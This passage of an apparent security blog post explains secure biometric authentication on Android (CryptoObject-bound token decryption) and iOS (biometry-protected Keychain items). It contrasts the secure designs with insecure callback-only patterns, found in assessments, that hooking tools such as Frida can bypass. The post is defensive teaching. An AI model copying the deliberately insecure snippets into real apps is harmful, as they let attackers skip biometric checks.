<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
. . .
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// storedIv: the IV saved together with the encrypted authentication token
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Cipher cipher = getCipherForBiometrics(storedIv);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
if (cipher != null) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
biometricPrompt.authenticate(promptInfo, new BiometricPrompt.CryptoObject(cipher));
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
. . .
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div><br /></div>
</div>
</div>
<br />
<div>
<span id="docs-internal-guid-cc69b288-7fff-3ba3-78bb-b5681090170d"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The biometric authentication flow is then managed by the Android platform, and the method </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">onAuthenticationSucceeded</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> is called upon a successful authentication. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">It is worth considering that this method can also be called by using hooking techniques and tools such as Frida. The difference between a valid authentication flow and a tampered authentication flow is the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">BiometricPrompt.CryptoObject</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Indeed, when a valid authentication flow is performed, the Android platform properly instantiates the cipher contained in the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">BiometricPrompt.CryptoObject</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">, and this cipher must then be used to decrypt critical data such as the aforementioned authentication token. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When the method is instead invoked through hooking, the cipher has not been properly instantiated, and an exception is raised as soon as it is used to decrypt the data.</span>
</p>
<div><br /></div></span>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
@Override
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
public void onAuthenticationSucceeded(BiometricPrompt.AuthenticationResult result) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Cipher cipher =
result.getCryptoObject().getCipher();
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// encryptedToken: the encrypted authentication token loaded from storage
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
byte[] decrypted = cipher.doFinal(encryptedToken);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
String authenticationToken = new String(decrypted, StandardCharsets.UTF_8);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// save the authentication token somewhere
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
. . .
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
</div>
</div>
<div><br /></div>
<span id="docs-internal-guid-7d63f8e1-7fff-7d0c-3b36-21d1db1ec584"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This implementation is secure even against hooking techniques because, when the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">onAuthenticationSucceeded</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> callback is invoked with Frida, the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">AuthenticationResult </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">object does not contain a valid cipher instance: the key, which was defined as usable only after a biometric authentication, has not been unlocked by the Android OS, so the cipher raises an exception when it is used to decrypt the data.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During the various assessments performed on mobile applications we've found several insecure implementations of biometric authentication that look like the following one:</span>
</p>
</span>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
@Override
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
public void onAuthenticationSucceeded(BiometricPrompt.AuthenticationResult result) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
enterApplication();
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
</div>
</div>
<br />
<div>
<span id="docs-internal-guid-8a95da69-7fff-0f0c-6bfe-c37e5e7bca04"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This kind of implementation is insecure since it does not make use of the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">BiometricPrompt.CryptoObject </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">contained in the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">AuthenticationResult </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">object: it assumes that the authentication has been properly validated simply because the method </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">onAuthenticationSucceeded </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">has been called, and lets the user enter the application.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">It is worth considering that even implementations that make use of the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">BiometricPrompt.CryptoObject </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">can be insecure if they do not decrypt data that is required to log the user in (such as an authentication token, a JWT and so on). Indeed, even exceptions can be caught with hooking techniques and ignored in order to let the application flow continue. </span>
</p>
<div><br /></div></span>
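<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">The following login routine is an added example (not code from the original post) that puts the two preceding paragraphs into practice: the success callback treats a missing CryptoObject, a missing cipher or a decryption failure as a failed authentication, and the only code path that opens the session is the one that received the decrypted token, so neither a forced callback nor a swallowed exception is enough to enter the application. The key alias, the SharedPreferences file and entry names where the IV and ciphertext were saved at enrollment, and the SessionOpener interface are assumed names; androidx.biometric is assumed to be on the classpath.</span></p>

```java
import android.content.Context;
import android.content.SharedPreferences;
import android.security.keystore.KeyPermanentlyInvalidatedException;
import android.security.keystore.KeyProperties;
import android.util.Base64;
import androidx.annotation.NonNull;
import androidx.biometric.BiometricPrompt;
import androidx.core.content.ContextCompat;
import androidx.fragment.app.FragmentActivity;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.KeyStore;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;

/**
 * Login side: the session is opened only with a token that the platform-unlocked
 * cipher actually decrypted; every other outcome fails closed.
 * Added example; KEY_ALIAS, PREFS and SessionOpener are assumed names.
 */
public final class BiometricTokenLogin {
    private static final String KEY_ALIAS = "biometric_token_key"; // assumed alias
    private static final String PREFS = "biometric_vault";          // assumed prefs file
    private static final String TRANSFORMATION = KeyProperties.KEY_ALGORITHM_AES + "/"
            + KeyProperties.BLOCK_MODE_CBC + "/" + KeyProperties.ENCRYPTION_PADDING_PKCS7;

    /** Hypothetical sink: the only code that may enter the application. */
    interface SessionOpener {
        void openSession(@NonNull String token);   // e.g. present the token to the backend
        void fallbackToCredentials();              // ask for username and password again
    }

    static void login(@NonNull FragmentActivity activity,
                      @NonNull BiometricPrompt.PromptInfo promptInfo,
                      @NonNull final SessionOpener opener) {
        final SharedPreferences prefs =
                activity.getSharedPreferences(PREFS, Context.MODE_PRIVATE);
        String ivB64 = prefs.getString("iv", null);
        String ctB64 = prefs.getString("token_ct", null);
        if (ivB64 == null || ctB64 == null) {
            opener.fallbackToCredentials(); // nothing enrolled yet
            return;
        }
        final byte[] ciphertext = Base64.decode(ctB64, Base64.NO_WRAP);

        final Cipher cipher;
        try {
            KeyStore keyStore = KeyStore.getInstance("AndroidKeyStore");
            keyStore.load(null);
            SecretKey key = (SecretKey) keyStore.getKey(KEY_ALIAS, null);
            cipher = Cipher.getInstance(TRANSFORMATION);
            // CBC decryption needs the IV that was stored next to the ciphertext
            cipher.init(Cipher.DECRYPT_MODE, key,
                    new IvParameterSpec(Base64.decode(ivB64, Base64.NO_WRAP)));
        } catch (KeyPermanentlyInvalidatedException e) {
            // Lock screen reset or biometric set changed: the token is unrecoverable
            prefs.edit().clear().apply();
            opener.fallbackToCredentials();
            return;
        } catch (GeneralSecurityException | IOException e) {
            opener.fallbackToCredentials(); // missing key, bad IV, unsupported cipher
            return;
        }

        new BiometricPrompt(activity, ContextCompat.getMainExecutor(activity),
                new BiometricPrompt.AuthenticationCallback() {
                    @Override
                    public void onAuthenticationSucceeded(
                            @NonNull BiometricPrompt.AuthenticationResult result) {
                        BiometricPrompt.CryptoObject crypto = result.getCryptoObject();
                        if (crypto == null || crypto.getCipher() == null) {
                            // A "success" without the unlocked cipher is not a success
                            opener.fallbackToCredentials();
                            return;
                        }
                        try {
                            byte[] plain = crypto.getCipher().doFinal(ciphertext);
                            String token = new String(plain, StandardCharsets.UTF_8);
                            opener.openSession(token); // the decrypted token is the proof
                        } catch (GeneralSecurityException e) {
                            // Cipher never unlocked by the OS: failed authentication
                            opener.fallbackToCredentials();
                        }
                    }

                    @Override
                    public void onAuthenticationError(int errorCode,
                                                      @NonNull CharSequence errString) {
                        opener.fallbackToCredentials();
                    }
                }).authenticate(promptInfo, new BiometricPrompt.CryptoObject(cipher));
    }
}
```

<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">Because openSession receives the token as its argument, a backend that validates the token on every request gives a server-side check that cannot be satisfied by altering the client's control flow alone; the decision to enter the application is tied to the decrypted secret rather than to the callback having run.</span></p>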
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<h3 style="text-align: left;">Biometric Authentication in iOS</h3>
<div>
<span id="docs-internal-guid-ac6780aa-7fff-6c5d-5711-b4fa49a64e2f"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The iOS platform introduced the biometric authentication starting from iPhone 5s in 2013. At that time it supported only the fingerprint authentication known as Touch ID.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When Apple released the iPhone X, the Face ID was added as biometric option that could be used to authenticate a user.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The biometric authentication flow is usually implemented with the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalAuthentication</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> framework. It is worth considering however that the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalAuthentication</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> framework is an event-based procedure and can be bypassed with hooking techniques and tools such as Frida or Objection.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Unlike Android, the iOS platform allows arbitrary data to be saved in the Keychain, defining the access criteria for every stored item.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">In order to implement an effective biometric authentication, it is suggested to rely on the Keychain methods rather than on the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalAuthentication</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> framework. This approach consists of storing sensitive data (such as an authentication token) in the Keychain and defining access criteria such that the data can be read only after a successful biometric authentication.</span>
</p>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><div style="text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">In order to use biometric authentication, it is necessary to check whether the biometric hardware is available and whether the user has enrolled biometric identities. This can be done using the </span><span style="font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">canEvaluatePolicy</span><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"> method as shown below:</span></div></span></span></div>
<div>
<span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span>
</div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><font face="arial"><span style="font-size: 14.6667px; white-space: pre-wrap;">import LocalAuthentication

let context = LAContext()
var error: NSError?
if context.canEvaluatePolicy(.deviceOwnerAuthenticationWithBiometrics, error: &error) {
    // handle biometric authentication
    . . .
}</span></font></div>
</div>
<br />
<div>
<span id="docs-internal-guid-8a3c8997-7fff-09c9-da38-349449a5cbd9"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">canEvaluatePolicy</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> method with the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">deviceOwnerAuthenticationWithBiometrics</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> flag, returns <i>true</i> only if the hardware to authenticate the user through biometrics is available and if the user has enrolled biometric factors.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When storing sensitive data for a biometric authentication within the Keychain it is recommended to use the following flags:</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1)</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"> kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: requires that a passcode is set on the device. The data is accessible only while the device is unlocked and is deleted when the user disables the passcode.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2) </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">kSecAccessControlBiometryCurrentSet/kSecAccessControlBiometryAny</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: requires the user to authenticate with biometrics (e.g. Face ID or Touch ID) before the data in the Keychain item can be accessed. When using </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">kSecAccessControlBiometryCurrentSet, </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">whenever the user adds a fingerprint or a face to the device, the Keychain entry is automatically invalidated. This ensures that the item can only be unlocked with the biometrics that were enrolled when the item was added to the Keychain.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The other accessibility flags should be avoided when storing data related to biometric authentication, since they do not necessarily require a biometric factor to retrieve the data when the application is accessed.</span>
</p>
<div style="text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span><div style="text-align: justify;"><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">The following example shows how to securely save data in the Keychain for biometric authentication:</span></div>
</div>
<div><br /></div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
var error: Unmanaged&lt;CFError&gt;?
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
guard let accessControl =
SecAccessControlCreateWithFlags(kCFAllocatorDefault,
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
SecAccessControlCreateFlags.biometryCurrentSet,
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
&error) else {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// failed to create AccessControl object
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
return
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
var query: [String: Any] = [:]
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecClass as String] = kSecClassGenericPassword
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecAttrLabel as String] = "label_for_auth_token" as
CFString
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecAttrAccount as String] = "App Account" as CFString
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecValueData as String] =
"here_goes_auth_token".data(using: .utf8)! as CFData
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecAttrAccessControl as String] = accessControl
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br />
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
let status = SecItemAdd(query as CFDictionary, nil)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
if status == noErr {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// successfully saved
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
} else {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// error while saving
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div><div style="text-align: justify;"><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">When the sensitive data is later requested, iOS prompts for biometric authentication and returns either the data or nil, depending on whether the biometric authentication succeeded.</span></div>
<div style="text-align: justify;"><br /></div>
</div>
<div>
<span id="docs-internal-guid-2c94db66-7fff-407d-67c8-b75ce6ff43ea"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During the various assessments performed on mobile applications we have found several insecure implementations of biometric authentication that rely on the <i>evaluatePolicy</i> method and look similar to the following one:</span>
</p>
<div><div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">let context = LAContext()</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">var error: NSError?</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">context.evaluatePolicy(.deviceOwnerAuthenticationWithBiometrics, localizedReason: "Authenticate with biometrics to access the application") { success, evaluationError in</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> guard success else {</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> // Authentication failed</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> return</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> }</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> // The only gate is this boolean: no Keychain item is unlocked</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> enterApplication()</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">}</div></div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<br />
<span id="docs-internal-guid-084ce31f-7fff-78eb-f000-22bf30caa044"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This kind of implementation is insecure since it does not make use of the Keychain: it assumes that authentication has been properly validated as soon as the success condition is met, and lets the user into the application.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Using hooking techniques or tools such as Frida or Objection, this kind of implementation could be bypassed without providing a valid biometric authentication.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">It is worth considering that even implementations that make use of the Keychain could be bypassed if the proper flags are not set when storing the data in it.
</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Specifically, the flags </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">kSecAttrAccessibleWhenUnlockedThisDeviceOnly</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> should be avoided since they do not require that a passcode has been previously set on the device and do not delete the data when the passcode is disabled. Furthermore, if the device has no passcode, the data is always accessible since the device is considered always unlocked.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Finally, the other <i>SecAccessControlCreateFlags</i>, except for the aforementioned <i>kSecAccessControlBiometryCurrentSet/kSecAccessControlBiometryAny</i>, should be avoided since they do not strictly require a biometric authentication:
